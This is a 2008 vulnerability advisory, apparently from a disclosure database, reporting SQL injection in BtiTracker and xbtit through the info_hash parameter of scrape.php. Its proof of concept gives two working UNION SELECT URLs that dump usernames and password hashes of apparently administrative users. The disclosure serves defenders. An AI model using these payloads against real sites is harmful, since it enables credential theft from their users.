SQL Injection Vulnerability in BtiTracker and xbtit

2008.08.26
Credit: Valery Marchuk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

SQL Injection Vulnerability in BtiTracker and xbtit Vulnerable products BtiTracker <=1.4.7 https://sourceforge.net/projects/btit-tracker/ xbtit <=2.0.542 http://www.btiteam.org Description A vulnerability is caused due to the application does not perform sanitation checks for input passed to the parameter info_hash in scrape.php. A remote attacker can inject and execute arbitrary SQL commands in application`s database. PoC ## Exploit: ## ========================================================= ## http://site/scrape.php?info_hash=1%27) ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 ## +FROM+users+WHERE+id_level=8/* ## ========================================================= ## for xBtiTracker we need to specify prefix: ## ========================================================= ## http://site/scrape.php?info_hash=1%27) ## +UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0 ## +FROM+xbtit_users+WHERE+id_level=8/* ## ========================================================= Original advisories http://www.securitylab.ru/vulnerability/358375.php http://www.securitylab.ru/vulnerability/358377.php Credits The vulnerability was discovered by InATeam (http://inattack.ru/). BR, Valery Marchuk www.SecurityLab.ru

References:

http://seclists.org/fulldisclosure/2008/Aug/0462.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top